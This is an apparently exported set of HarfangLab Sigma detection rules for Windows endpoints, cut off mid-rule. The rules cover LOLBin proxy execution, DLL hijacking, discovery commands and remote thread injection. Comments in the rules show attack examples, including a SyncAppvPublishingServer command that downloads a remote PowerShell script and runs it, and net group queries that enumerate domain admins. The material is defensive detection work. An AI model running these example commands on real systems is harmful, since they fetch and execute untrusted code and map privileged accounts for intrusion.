"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075243Z",
"creation_date": "2026-03-23T11:45:34.075245Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075249Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/",
"https://twitter.com/monoxgas/status/895045566090010624",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_syncappvpublishingserver.yml",
"content": "title: Suspicious Proxy Execution via SyncAppvPublishingServer.exe\nid: 7ef5765c-b012-4951-9fc8-5dfa739c8d6c\ndescription: |\n Detects the use of SyncAppvPublishingServer which is used by Microsoft Application Virtualization (App-V).\n This binary may be abused by attackers to bypass security restrictions and execute PowerShell code.\n It is recommended to check the behavior of the process and search for PowerShell execution to determine whether this action is legitimate. This behavior is highly suspicious if App-V is not deployed on the machine.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/\n - https://twitter.com/monoxgas/status/895045566090010624\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/03/01\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.SyncAppvPublishingServer\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\SyncAppvPublishingServer.exe'\n - OriginalFileName: 'syncappvpublishingserver.exe'\n selection_command:\n # SyncAppvPublishingServer.exe n; Start-Process calc.exe\n # SyncAppvPublishingServer.exe \"n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX\"\n CommandLine|contains: 'n;'\n condition: all of selection_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7ef5765c-b012-4951-9fc8-5dfa739c8d6c",
"rule_name": "Suspicious Proxy Execution via SyncAppvPublishingServer.exe",
"rule_description": "Detects the use of SyncAppvPublishingServer which is used by Microsoft Application Virtualization (App-V).\nThis binary may be abused by attackers to bypass security restrictions and execute PowerShell code.\nIt is recommended to check the behavior of the process and search for PowerShell execution to determine whether this action is legitimate. This behavior is highly suspicious if App-V is not deployed on the machine.\n",
"rule_creation_date": "2022-03-01",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f36c250-2b15-4c30-b99b-c77071db7a53",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599302Z",
"creation_date": "2026-03-23T11:45:34.599306Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599314Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ngciso.yml",
"content": "title: DLL Hijacking via ngciso.exe\nid: 7f36c250-2b15-4c30-b99b-c77071db7a53\ndescription: |\n Detects potential Windows DLL Hijacking via ngciso.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ngciso.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\iumbase.DLL'\n - '\\iumsdk.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f36c250-2b15-4c30-b99b-c77071db7a53",
"rule_name": "DLL Hijacking via ngciso.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ngciso.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f39ba1d-5f3b-4c6d-b442-1b862570323f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087220Z",
"creation_date": "2026-03-23T11:45:34.087223Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087227Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/0gtweet/status/1581191005537468417",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_hvc.yml",
"content": "title: Proxy Execution via Hvc.exe\nid: 7f39ba1d-5f3b-4c6d-b442-1b862570323f\ndescription: |\n Detects a suspicious execution of Hvc.exe as a proxy to launch another application.\n Attackers can set a command to be executed by Hvc in the HV_SSH_COMMAND environment variable.\n This technique can be used to bypass defensive measures.\n It is recommended to analyze the process responsible for the execution of Hvc.exe as well as to look for malicious actions performed by child processes.\nreferences:\n - https://twitter.com/0gtweet/status/1581191005537468417\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/10/27\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_grandparent:\n GrandparentCommandLine|contains|all:\n - 'ssh'\n - 'dummyparam'\n\n selection_parent:\n ParentCommandLine|endswith: '\\cmd.exe /c * -o ProxyCommand=* nc -t vsock,ip --ssh --host-prefix hyper-v/ \"%h\" %p -o HostName=hyper-v/%h dummyparam'\n\n exclusion_sitekiosk:\n ParentCommandLine|startswith: '?:\\Program Files (x86)\\SiteKiosk\\SiteKiosk.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f39ba1d-5f3b-4c6d-b442-1b862570323f",
"rule_name": "Proxy Execution via Hvc.exe",
"rule_description": "Detects a suspicious execution of Hvc.exe as a proxy to launch another application.\nAttackers can set a command to be executed by Hvc in the HV_SSH_COMMAND environment variable.\nThis technique can be used to bypass defensive measures.\nIt is recommended to analyze the process responsible for the execution of Hvc.exe as well as to look for malicious actions performed by child processes.\n",
"rule_creation_date": "2022-10-27",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f521bea-fbfa-4c6c-8d8b-391265ec0d9c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622488Z",
"creation_date": "2026-03-23T11:45:34.622490Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622495Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1082/",
"https://www.welivesecurity.com/en/eset-research/moon-backdoors-lunar-landing-diplomatic-missions/",
"https://www.avira.com/en/blog/new-wave-of-plugx-targets-hong-kong",
"https://www.cisa.gov/news-events/analysis-reports/ar20-198a",
"https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/",
"https://www.netscout.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia"
],
"name": "t1082_systeminfo.yml",
"content": "title: Systeminfo Execution\nid: 7f521bea-fbfa-4c6c-8d8b-391265ec0d9c\ndescription: |\n Detects the execution of systeminfo.exe.\n Systeminfo.exe is a legitimate Microsoft binary that can be used by attackers during the discovery phase to gather detailed information about a computer.\n It is recommended to analyze the process responsible for the execution of route.exe to look for malicious content or actions.\nreferences:\n - https://attack.mitre.org/techniques/T1082/\n - https://www.welivesecurity.com/en/eset-research/moon-backdoors-lunar-landing-diplomatic-missions/\n - https://www.avira.com/en/blog/new-wave-of-plugx-targets-hong-kong\n - https://www.cisa.gov/news-events/analysis-reports/ar20-198a\n - https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/\n - https://www.netscout.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia\ndate: 2021/04/01\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1082\n - attack.s0096\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\systeminfo.exe'\n # Renamed binaries\n - OriginalFileName: 'sysinfo.exe'\n\n exclusion_parent:\n ParentImage: '?:\\Windows\\explorer.exe'\n GrandparentImage: '?:\\Windows\\System32\\userinit.exe'\n\n exclusion_explorer:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_programfiles:\n - ProcessParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - ProcessGrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_image:\n - ParentImage:\n - '*\\AppData\\Local\\ElsterAuthenticator\\ElsterAuthenticator.exe'\n - '?:\\pilote\\NoyauEVM\\NoyauEVM.exe'\n - '?:\\Windows\\System32\\msiexec.exe'\n - GrandparentImage:\n - '*\\AppData\\Local\\Programs\\Alcatel-Lucent Enterprise\\Rainbow\\Rainbow.exe'\n - '?:\\\\*\\Applications\\PatchManager\\W100TInstaller\\W100TInstallerSvc.exe'\n - '?:\\Xilinx\\xic\\tps\\win64\\\\*\\bin\\java.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MpCmdRun.exe'\n - '?:\\Users\\\\*\\IBM\\ClientSolutions\\Start_Programs\\Windows_x86-64\\acslaunch_win-64.exe'\n - '?:\\ManageEngine\\UEMS_DistributionServer\\bin\\dcagentregister.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Program Files\\Palo Alto Networks\\Traps\\cyserver.exe'\n - '?:\\Program Files (x86)\\Trend Micro\\Endpoint Basecamp\\EndpointBasecamp.exe'\n - '?:\\Program Files (x86)\\Lenovo\\System Update\\SUService.exe'\n - '?:\\Program Files\\AVAST Software\\Business Agent\\agentsvc.exe'\n - '\\MSSQL\\Binn\\sqlservr.exe'\n - '?:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe'\n - '?:\\Windows\\ADDMRemQuery_x86_64_v2.exe'\n - '?:\\Program Files (x86)\\Lenovo\\VantageService\\\\*\\LenovoVantageService.exe'\n - '?:\\Program Files\\SentinelOne\\Sentinel Agent *\\SentinelAgent.exe'\n\n exclusion_commvault_diagnostics:\n GrandparentImage|endswith: 'CvDiagnostics.exe'\n\n exclusion_lenovo_systemupdate1:\n # great great grandfather is: \"C:\\Program Files (x86)\\Lenovo\\System Update\\\\Tvsukernel.exe\"\n # great great grandfather is: C:\\PROGRA~3\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\n1nuj32w\\WINUPTP.EXE\n # grandfather is: \"C:\\Windows\\sysnative\\cmd.exe\" \"/c susbde.bat\"\n GrandparentCommandLine|contains|all:\n - '\\Windows\\sysnative\\cmd.exe'\n - 'susbde.bat'\n\n exclusion_lenovo_systemupdate2:\n GrandparentCommandLine:\n # cmd.exe /C C:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\n20rg22w\\SusBde.bat\n - 'cmd.exe /C ?:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\\\*\\SusBde.bat'\n # cmd.exe /C C:\\ProgramData\\Lenovo\\ImController\\SystemPluginData\\LenovoSystemUpdatePlugin\\session\\Repository\\n2irg32w\\SusBde.bat\n - 'cmd.exe /C ?:\\ProgramData\\Lenovo\\ImController\\SystemPluginData\\LenovoSystemUpdatePlugin\\\\*\\SusBde.bat'\n # cmd.exe /C C:\\ProgramData\\Lenovo\\Vantage\\AddinData\\LenovoSystemUpdateAddin\\session\\Repository\\n2hrg33w\\SusBde.bat\n - 'cmd.exe /C ?:\\ProgramData\\Lenovo\\Vantage\\AddinData\\LenovoSystemUpdateAddin\\session\\Repository\\\\*\\SusBde.bat'\n CommandLine: '?:\\windows\\System32\\systeminfo.exe /FO CSV /NH'\n\n exclusion_dfir_orc:\n ParentImage: '*\\DFIR-Orc_x64.exe'\n ParentCommandLine|contains: ' WolfLauncher'\n\n exclusion_vscode:\n ParentImage: '?:\\Windows\\System32\\cmd.exe'\n GrandparentImage|endswith: '\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n\n exclusion_sara:\n ParentCommandLine: 'powershell.exe (systeminfo /fo csv | ConvertFrom-Csv | Select-Object OS\\*)'\n GrandparentImage|endswith: '\\Microsoft.Sara.exe'\n\n exclusion_vmware:\n ParentCommandLine:\n # /s /v/qn /L\n # /s /v/qb-\n # /mg /s /v/qb-\n - '?:\\Windows\\TEMP\\vmware-SYSTEM\\\\????????\\setup64.exe * REBOOT=R VMREBOOTPROMPT=Y /L ?:\\Windows\\TEMP\\vmware-SYSTEM\\vmupgrader_msi.log_????????_??????.log'\n - '?:\\Windows\\TEMP\\vmware-Système\\\\????????\\setup64.exe * REBOOT=R VMREBOOTPROMPT=Y /L ?:\\Windows\\TEMP\\vmware-Système\\vmupgrader_msi.log_????????_??????.log'\n - '?:\\Windows\\TEMP\\vmware-SYSTEM\\\\????????\\setup64.exe /mg /s /v/qn'\n - '?:\\Windows\\TEMP\\vmware-Système\\\\????????\\setup64.exe /mg /s /v/qn'\n - '?:\\Windows\\TEMP\\vmware-SYSTEM-??????????\\\\????????\\setup64.exe /mg /s /v/qn'\n - '?:\\Windows\\TEMP\\vmware-Système-??????????\\\\????????\\setup64.exe /mg /s /v/qn'\n - '?:\\Windows\\TEMP\\vmware-SYSTEM\\\\????????\\setup64.exe /s /v/qn'\n - '?:\\Windows\\TEMP\\vmware-Système\\\\????????\\setup64.exe /s /v/qn'\n GrandparentImage:\n - '?:\\Windows\\Temp\\vmware-SYSTEM\\\\????????\\setup.exe'\n - '?:\\Windows\\Temp\\vmware-Système\\\\????????\\setup.exe'\n\n exclusion_ivanti:\n # Ivanti Patch Management service\n ParentCommandLine|startswith: '?:\\Windows\\ProPatches\\Patches\\'\n CurrentDirectory: '?:\\Windows\\ProPatches\\Installation\\InstallationSandbox#????-??-??-T-??-??-??'\n\n exclusion_azure_networkwatcher:\n ParentCommandLine: '?:\\Windows\\System32\\cmd.exe /c systeminfo >> config\\osinfo.txt'\n GrandparentCommandLine: '?:\\Windows\\system32\\cscript.exe ?:\\Windows\\system32\\gatherNetworkInfo.vbs'\n\n exclusion_gitkraken:\n GrandparentImage: '?:\\Users\\\\*\\AppData\\Local\\gitkraken\\app-*\\gitkraken.exe'\n\n exclusion_netbackup:\n Ancestors|contains: '|?:\\Windows\\System32\\cmd.exe|?:\\Program Files\\Veritas\\NetBackup\\var\\tmp\\telemetry\\par-*\\temp-*\\nbtelemetry.exe|'\n\n exclusion_manageengine1:\n GrandparentCommandLine|contains: ';../lib/AdventNetUpdateManagerInstaller.jar;'\n GrandparentImage|endswith: '\\bin\\java.exe'\n\n exclusion_manageengine2:\n ProcessGrandparentProduct: 'ADManager Plus'\n ProcessGrandparentCompany: 'Zoho Corporation Pvt. Ltd.'\n\n exclusion_flexera:\n ProcessGrandparentOriginalFileName: 'gui.exe'\n ProcessGrandparentDescription: 'LaunchAnywhere'\n ProcessGrandparentCompany: 'Flexera Software'\n\n exclusion_rocket:\n ProcessParentImage|endswith:\n - '\\Rocket.exe'\n - '\\Lts.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature|contains: 'AREAL SAS'\n\n exclusion_intersystems:\n ProcessGrandparentOriginalFileName:\n - 'Cache.exe'\n - 'irisdb.exe'\n ProcessGrandparentCompany: 'InterSystems'\n\n exclusion_actuate:\n ProcessParentOriginalFileName: 'pmd11.exe'\n ProcessParentCompany: 'Actuate Corporation'\n\n exclusion_siemens:\n GrandparentCommandLine: '?:\\Windows\\System32\\cmd.exe /C ?:\\Program Files\\Siemens\\syngo\\OperationalManagement\\HealthCheck\\runHealthCheckInShell.bat'\n\n exclusion_carestream:\n GrandparentCommandLine|contains: 'perl*?:\\PROGRA~1\\CAREST~1\\System5\\scripts\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f521bea-fbfa-4c6c-8d8b-391265ec0d9c",
"rule_name": "Systeminfo Execution",
"rule_description": "Detects the execution of systeminfo.exe.\nSysteminfo.exe is a legitimate Microsoft binary that can be used by attackers during the discovery phase to gather detailed information about a computer.\nIt is recommended to analyze the process responsible for the execution of route.exe to look for malicious content or actions.\n",
"rule_creation_date": "2021-04-01",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1082"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f5ee141-ceb0-477a-8817-f631dba06a51",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083690Z",
"creation_date": "2026-03-23T11:45:34.083692Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083696Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
"https://techcommunity.microsoft.com/t5/security-compliance-and-identity/track-changes-to-sensitive-groups-with-advanced-hunting-in/ba-p/3275198",
"https://attack.mitre.org/techniques/T1069/002/"
],
"name": "t1069_002_net_sensitive_group.yml",
"content": "title: Sensitive Group Content Discovered via net.exe\nid: 7f5ee141-ceb0-477a-8817-f631dba06a51\ndescription: |\n Detects the execution of the net command to discover the content of sensitive groups.\n The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\n Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n It is recommended to correlate this alert with other discovery activity and suspicious connections on the network.\nreferences:\n - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/\n - https://techcommunity.microsoft.com/t5/security-compliance-and-identity/track-changes-to-sensitive-groups-with-advanced-hunting-in/ba-p/3275198\n - https://attack.mitre.org/techniques/T1069/002/\ndate: 2023/04/05\nmodified: 2025/10/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ActiveDirectory\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # net group domain administrators /domain\n # net group domain admins /domain\n # net group Admins du domaine /domain\n selection_image:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n selection_domain:\n CommandLine|contains: ' /dom'\n\n selection_group_admin:\n CommandLine|contains|all:\n - ' admin'\n - ' domain'\n selection_group_other:\n CommandLine|contains:\n - 'Account Operators'\n - 'Backup Operators'\n - 'Domain Computers'\n - 'Domain Controllers'\n - 'Enterprise Admins'\n - 'Exchange Trusted Subsystem'\n - 'Exchange Organization Administrators'\n - 'Microsoft Exchange Servers'\n - 'Print Operators'\n - 'Schema Admins'\n - 'Server Operators'\n\n condition: selection_image and selection_domain and 1 of selection_group_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f5ee141-ceb0-477a-8817-f631dba06a51",
"rule_name": "Sensitive Group Content Discovered via net.exe",
"rule_description": "Detects the execution of the net command to discover the content of sensitive groups.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\nIt is recommended to correlate this alert with other discovery activity and suspicious connections on the network.\n",
"rule_creation_date": "2023-04-05",
"rule_modified_date": "2025-10-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1069.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f69ffe6-5b1a-43bb-b560-4d69ff1d5166",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619888Z",
"creation_date": "2026-03-23T11:45:34.619890Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619895Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_suspicious_remote_thread_uncommon_location.yml",
"content": "title: Remote Thread Created from Process in Uncommon Location\nid: 7f69ffe6-5b1a-43bb-b560-4d69ff1d5166\ndescription: |\n Detects suspicious remote threads that are not mapped to a legitimate DLL/executable and created by a process in an uncommon location.\n Adversaries may inject malicious code in a web browser (ie. Firefox, Chrome, Edge...) or in LSASS to steal sensitive information such as credentials.\n If the thread is injected in another process, it could be an attempt at performing malicious activity within a legitimate process.\n It is recommended to investigate the process injecting the thread and the injected process for suspicious activity such as uncommon network connections or child processes.\nreferences:\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/12/11\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n SourceImage|startswith:\n - '?:\\perflogs\\'\n - '?:\\Users\\'\n - '?:\\programdata\\'\n - '?:\\Windows\\'\n - '?:\\\\?Recycle.Bin\\'\n exclusion_module:\n StartModule|contains:\n - '.dll'\n - '.exe'\n - '.com'\n exclusion_defender:\n SourceImage|endswith: '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n exclusion_firefox_flash:\n ProcessOriginalFileName: 'firefox.exe'\n TargetImage|contains: 'FlashPlayerPlugin'\n exclusion_edge:\n SourceImage|endswith: '\\Microsoft\\Edge\\Application\\msedge.exe'\n TargetImage|endswith: '\\Microsoft\\Edge\\Application\\msedge.exe'\n exclusion_chrome:\n SourceImage|endswith: 'chrome.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Google Inc'\n - 'Google LLC'\n TargetImage|endswith: '\\chrome.exe'\n exclusion_chromium:\n SourceImage|endswith: 'chromium.exe'\n ProcessSigned: 'true'\n TargetImage|endswith: '\\chromium.exe'\n exclusion_IpDivaVpn:\n SourceImage|endswith: '\\IpDivaVpnTunnelingStarter\\AdisProcessInjection64.exe'\n TargetImage: '?:\\Windows\\System32\\mstsc.exe'\n exclusion_java:\n SourceImage|endswith:\n - '\\bin\\jconsole.exe'\n - '\\bin\\java.exe'\n - '\\bin\\javaw.exe'\n - '\\bin\\jcmd.exe'\n - '\\bin\\idea64.exe'\n - '\\bin\\jmap.exe'\n - '\\bin\\jmc.exe'\n - '\\bin\\jstack.exe'\n - '\\bin\\jprofiler.exe'\n TargetImage|endswith:\n - '\\bin\\jconsole.exe'\n - '\\bin\\java.exe'\n - '\\bin\\javaw.exe'\n - '\\bin\\jcmd.exe'\n - '\\bin\\idea64.exe'\n - 